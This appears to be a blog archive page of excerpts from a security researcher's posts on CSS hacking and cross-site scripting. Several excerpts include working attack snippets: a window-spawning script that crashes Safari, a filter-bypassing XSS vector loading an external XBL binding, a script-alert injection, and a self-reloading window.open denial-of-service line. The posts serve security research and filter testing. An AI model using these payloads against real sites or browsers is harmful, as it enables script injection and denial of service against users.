Hacking CSS is a great challenge and can lead to interesting results, I’ve reignited my interest thanks to sirdarckcat and Thornmaker who have done some fantastic work. I wanted a way to do animation and loops in pure CSS and I think it’s sorta possible using meta refresh. I know meta refresh is slightly cheating […]

Thornmaker has improved my CSS logic script which is much neater and requires less styles, good work 🙂 Sirdarckcat has also created multiplication which is amazing stuff, so I had a bit of spare time and I decided to see if it was possible to create toggles in CSS with a visual appearance of a […]

This causes DOS in the latest Safari and maybe other browsers too. I tried it in Opera and it does create loads of tabs but seems stable enough to close it down. Enjoy! 🙂 <script type="text/javascript"> window.onload = function() { setInterval(‘spawn()’,1); } function spawn() { frm = document.createElement(‘form’); frm.target = ‘x’ + Math.round(Math.random() * 100000); […]

Inspired by the great work of Sirdarckcat on CSK2, I’ve decided to produce a POC which performs basic logic in pure CSS. The example simply adds the numbers together depending on which checkbox you check. My next experiment will be with loops and then we can start creating some really cool games in CSS 😀 […]

There’s some really awesome stuff going on at the moment, I thought I’d mention a few in case you’re not aware of them. PHPIDS This is such a great project because so many talented people have been involved and have tried to hack the system. The code has moved on tremendously from the first version […]

Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles. Credits update The expression part of this technique was first demonstrated by Dan on the slackers forums, […]

When someone uses htmlentities I’ve seen it time and time again that they expect that it filters variables from all XSS. This is wrong of course because the function requires a second parameter ENT_QUOTES which correctly replaces quote characters. Some developers aren’t even aware that quotes can lead to XSS injection. This leads me to […]

Hacking the PHPIDS again I found some cool XSS:- <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business \i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> I’ve moved it onto two lines for correct display. Who’d have thought that Firefox would allow all that within the url and CSS properties 😀

Hello my student here I’ll show you the way of the tiger, if a deadly Firefox ninja approaches your dojo with a XSS punch:- "><script>alert(/XSS PUNCH!/)</script> Then you can respond with the crouching tab hidden dos move:- self.location = “javascript:window.open(‘javascript:document.clear(); document.open();document.close();self.location=self.location’)”; This move can frustrate your opponent into submission.

I’ve been trying to automate the stuff that I normally do when XSS testing to make it easier than writing custom scripts each time. This worked really well for my fuzzing script which fuzzed random characters embedded into tags to find unusual combinations of characters. I’ve done the same again but this time it inspects […]